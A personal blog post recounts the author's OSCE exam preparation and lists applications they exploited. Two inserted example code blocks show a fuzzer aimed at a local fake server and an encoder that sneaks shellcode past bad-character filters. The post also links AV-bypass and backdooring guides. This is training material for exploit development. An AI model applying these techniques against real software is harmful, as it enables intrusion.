My OSCE Experience

Hi guys,
After OSCP and OSWP, I finally got my OSCE certification as well. I'm continuing with my personal plan to complete all the Offsec certs and have just bagged another beast! As always, I want to share my experience and personal study plan for OSCE.
Status Before OSCE: I was able to exploit basic buffer overflows and had a solid understanding of memory.

Status After OSCE: I have learned many complex techniques and can write my own exploits from scratch.

** During OSCP prep I was trying to understand how to exploit a basic buffer overflow and spent hours on Minishare. After OSCE, I wrote a script for Minishare in 4 minutes. I think this explains everything 😀
Before the Lab/Self Prep:

  • I read as many blog posts and study paths for OSCE as I could and, as always, created my own path.
  • I finished the SLAE course to refresh my assembly. That course is outstanding.
  • I read and re-wrote the exploits from the exploit development series on the Corelan and FuzzySecurity blogs. They are super cool and helped me a lot.
  • I learned how to fuzz with different tools (SPIKE, boofuzz and custom scripts).
  • I wrote many, many exploits involving SEH overwrites and egg hunting. Check out my GitHub page to see what I mean by many 🙂
  • I read other people's exploits on Exploit-DB and in blog posts. Over time I realized that I had developed my own style of writing exploits.
  • I started working on AV bypass: three days a week on AV bypass, the other four writing exploits.
  • I learned techniques such as socket reuse, custom shellcode writing and alphanumeric shellcoding (which killed me for days; now I can do it in my dreams).
  • I worked specifically on my assembly knowledge.
  • I fell in love with Immunity Debugger 😀
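The "custom scripts" part of the fuzzing bullet above usually means a small length-stepping fuzzer that grows one field until the service stops answering. The following is an added example, not a script from the post or from any of the products listed later. So that it runs offline it ships with a constructed stand-in for a vulnerable FTP-style daemon: the fake server stops replying (and stops accepting connections) once the USER argument exceeds an assumed CRASH_AT of 700 bytes, which is roughly what a real target looks like from the fuzzer's side once the process has died under the debugger.

```python
"""
Length-stepping TCP fuzzer of the kind used to find a service's crash
length before writing the exploit. Added example with a constructed target.
"""
import socket
import threading

CRASH_AT = 700          # assumed threshold of the fake server, not of any real product
HOST = "127.0.0.1"


def fake_vulnerable_server():
    """Constructed target. Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))                  # port 0: let the OS pick a free one
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        alive = True
        while alive:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(b"220 demo ftpd ready\r\n")
                line = b""
                while b"\r\n" not in line:   # read one complete command line
                    chunk = conn.recv(65536)
                    if not chunk:
                        break
                    line += chunk
                if len(line) - len(b"USER \r\n") > CRASH_AT:
                    alive = False            # "crash": no reply, stop listening
                else:
                    conn.sendall(b"331 password required\r\n")
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def fuzz_user_field(port, start=100, step=100, limit=3000):
    """Send USER arguments of growing length and watch for the service to
    stop answering. Returns (crash_length, last_answered_length);
    crash_length is None if every length up to `limit` was answered."""
    last_ok = 0
    for length in range(start, limit + 1, step):
        payload = b"USER " + b"A" * length + b"\r\n"
        try:
            with socket.create_connection((HOST, port), timeout=2) as s:
                s.recv(1024)                 # banner
                s.sendall(payload)
                reply = s.recv(1024)
        except OSError:                      # refused, reset or timed out
            return length, last_ok
        if not reply:                        # EOF with no reply: it died on this one
            return length, last_ok
        last_ok = length
    return None, last_ok


if __name__ == "__main__":
    port = fake_vulnerable_server()
    crash, ok = fuzz_user_field(port)
    print(f"last answered length: {ok}, first crashing length: {crash}")
```

Against a real service you would run this with the target attached in Immunity Debugger; the pair (last answered, first crashing) bounds the buffer size, and the next step is to replace the `A`s with a cyclic pattern to locate the exact overwrite offset.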

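The alphanumeric shellcoding mentioned in the list is, in the OSCE-style variant, really a restricted-character encoder: zero EAX with two ANDs whose immediates are harmless bytes, SUB a few harmless immediates so that EAX wraps around to four bytes of the real payload, PUSH EAX, and repeat from the last dword of the payload to the first so the original shellcode is rebuilt on the stack. The encoder below is an added example, not code from the post or from the Corelan/FuzzySecurity tutorials it cites. It assumes the target lets the opcode bytes 0x25 (AND EAX,imm32), 0x2D (SUB EAX,imm32) and 0x50 (PUSH EAX) through, that ESP has already been aligned to sit just past the encoder so the pushes land where execution falls through (that alignment stub is not shown), and an invented bad-character list for a hypothetical target. It also generalises the usual three-SUB scheme to any number of SUBs, which matters because with strictly alphanumeric immediates three SUBs cannot reach every byte value.

```python
"""
SUB-encoder for shellcode that must survive a restricted character set.
Added example; the bad-character list is an assumption, not a real target's.
"""
from itertools import product

ALNUM = bytes(range(0x30, 0x3A)) + bytes(range(0x41, 0x5B)) + bytes(range(0x61, 0x7B))
ASSUMED_BAD = b"\x00\x0a\x0d\x20\x2f\x3a"     # hypothetical target's bad chars
PRINTABLE = bytes(b for b in range(0x21, 0x7F) if b not in ASSUMED_BAD)

AND_MASKS = (0x41414141, 0x32323232)          # 'AAAA' & '2222' == 0, so two ANDs clear EAX


def sub_terms(target, allowed, n_terms=3):
    """Find n_terms dwords, every byte of which is in `allowed`, such that
    (0 - t1 - t2 - ...) mod 2**32 == target. Since t1 + t2 + ... must equal
    -target mod 2**32, solve it column by column from the low byte with a
    carry, like a paper addition."""
    need = (-target) & 0xFFFFFFFF
    terms = [0] * n_terms
    carry = 0
    for byte_idx in range(4):
        want = (need >> (8 * byte_idx)) & 0xFF
        for head in product(allowed, repeat=n_terms - 1):
            last = (want - carry - sum(head)) & 0xFF   # whatever makes the column add up
            if last in allowed:
                for i, value in enumerate(head + (last,)):
                    terms[i] |= value << (8 * byte_idx)
                carry = (sum(head) + last + carry) >> 8
                break
        else:
            raise ValueError(
                f"byte {want:#04x} not reachable with {n_terms} SUBs over this charset")
    return terms


def encode(shellcode, allowed=PRINTABLE, n_terms=3):
    """Emit x86 code whose immediates use only `allowed` bytes and which
    rebuilds `shellcode` (NOP-padded to a multiple of 4) on the stack."""
    padded = shellcode + b"\x90" * (-len(shellcode) % 4)
    out = bytearray()
    for off in range(len(padded) - 4, -1, -4):          # last dword is pushed first
        chunk = int.from_bytes(padded[off:off + 4], "little")
        for mask in AND_MASKS:
            out += b"\x25" + mask.to_bytes(4, "little")  # and eax, imm32
        for term in sub_terms(chunk, allowed, n_terms):
            out += b"\x2d" + term.to_bytes(4, "little")  # sub eax, imm32
        out += b"\x50"                                    # push eax
    return bytes(out)


def simulate(encoded):
    """Interpret the three opcodes the encoder emits and return the bytes
    left on the stack, lowest address first: the decoded payload."""
    eax, pushes, i = 0, [], 0
    while i < len(encoded):
        op = encoded[i]
        if op == 0x50:
            pushes.append(eax.to_bytes(4, "little"))
            i += 1
            continue
        imm = int.from_bytes(encoded[i + 1:i + 5], "little")
        if op == 0x25:
            eax &= imm
        elif op == 0x2D:
            eax = (eax - imm) & 0xFFFFFFFF
        else:
            raise ValueError(f"unexpected opcode {op:#04x} at offset {i}")
        i += 5
    return b"".join(reversed(pushes))     # the earliest push sits at the highest address


# Constructed sample payload: a few bytes that would not survive a typical
# bad-character filter (NUL, LF, CR, 0xff). Stands in for real shellcode.
SAMPLE = b"\x90\x90\x90\x90\x31\xc0\x50\x68\x00\x0a\x0d\xff\xd0"

if __name__ == "__main__":
    blob = encode(SAMPLE)
    assert simulate(blob) == SAMPLE + b"\x90" * 3
    print(blob.decode("ascii"))
```

`simulate` is only a check that the arithmetic round-trips; in the real exploit you confirm the same thing by stepping through the decoder in Immunity Debugger and watching the original bytes appear just below ESP. The charset passed as `allowed` should come straight from the bad-character analysis of the target, and if the target really accepts only letters and digits, `n_terms=4` is the cheap way out.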
I had a very demanding consultancy job at the same time, so my self-study schedule looked like this:

  • Coming home from work: 19.00-19.30
  • Self Study: 20.00-24.00
  • Self Study 2: 04.00-07.00
  • Go to work: 08.00

Human Time: ???!
Believe me, doing this for 4 consecutive months was pretty crazy. But is there anything more beautiful than hacking at night? 😀
And last but not least, during my preparation I wrote exploits for the following applications:

  1. BigAnt Server 2.52 SP5
  2. BlazeDVD 5 Professional
  3. Cesar FTP 0.9.9g
  4. Dup Scout Enterprise 10.0.18
  5. DVD X Player 5.5
  6. Easy CD DVD Copy v1.3.24
  7. Easy File Management Web Server 5.3
  8. Easy File Sharing FTP Server 3.5
  9. Easy File Sharing Web Server 7.2
  10. Easy RM to MP3 Converter 2.7.3.7
  11. Easy_Chat_Server_3.1
  12. EurekaEmailClient2.2
  13. FreeFloat FTP
  14. FreeFTP 1.0.8
  15. HP NNM 7.53
  16. KarjaSoft_Sami_FTP_Server_2.0.1
  17. KnFTP_Server_1.0.0
  18. Kolibri v2.0 HTTP Server
  19. LabF nfsAxe FTP Client 3.7
  20. Millenium MP3 Studio1.0
  21. MinaliC WebServer 2.0.0 
  22. Minishare 1.4.1 
  23. ProSysInfo TFTP Server TFTPDWIN 0.4.2 
  24. Quick Zip v4.60.019
  25. R v3.4.4
  26. Ricoh DC Software DL-10 FTP Server
  27. Savant Web Server 3.1
  28. Serv-U 9.0.0.5
  29. Solar FTP Server 2.1.1
  30. Soritong MP3 Player 1.0
  31. Spipe (McAfee HTTP Server (NAISERV.exe))
  32. SysGauge Pro v4.6.12
  33. Vulnserver GMON
  34. Vulnserver HTER
  35. Vulnserver KSTET
  36. Vulnserver LTER
  37. Vulnserver TRUN
  38. Xitami Webserver 2.5
  39. zipper

I have already shared most of them on my GitHub page. At that point I thought I was ready for the lab 😀
Lab:
  • I already do web pentesting all the time in my freelance job, so the web section was not a problem for me.
  • After my pre-lab work I was already familiar with SEH, egghunting and ASLR bypass; I refreshed my knowledge in the lab.
  • AV bypass was pretty straightforward. Apparently I did my pre-study well.
  • I solved every section of the lab 4 times during my lab time.
Exam:
I'm sorry, but I won't write anything lovely in this section. The exam was brutal. You need to be really familiar with everything and to have practised a lot. I checked my sanity a couple of times during the exam. I finished the exam on the second day.

Conclusion:
After OSCE, I realized that I was born to do binary exploitation. I'm really into it now and I don't think I will ever be able to stop. Before jumping into OSWE, I have already created a roadmap for myself to continue with binary exploitation nonstop. So thanks once more to the Offsec guys for helping me find my way with the Try Harder philosophy. You guys are amazing!
I hope this helps people preparing for OSCE. Stay tuned for the next blog post on OSWE 🙂 In the meantime, I'll dive into the reverse engineering world 😀
Cheers!

Busra

References:

Automated fuzzing: (Spike)

https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf

https://resources.infosecinstitute.com/intro-to-fuzzing/

Assembly and Shellcode basics:

Security Tube Linux Assembly Expert (32 bit) course

SEH

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows

https://fuzzysecurity.com/tutorials/expDev/1.html

Egghunting

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

https://fuzzysecurity.com/tutorials/expDev/1.html

AV Bypass

https://captmeelo.com/exploitdev/osceprep/2018/07/21/backdoor101-part2.html

https://haiderm.com/fully-undetectable-backdooring-pe-file/

My Scripts:
https://github.com/areyou1or0/OSCE-Exploit-Development
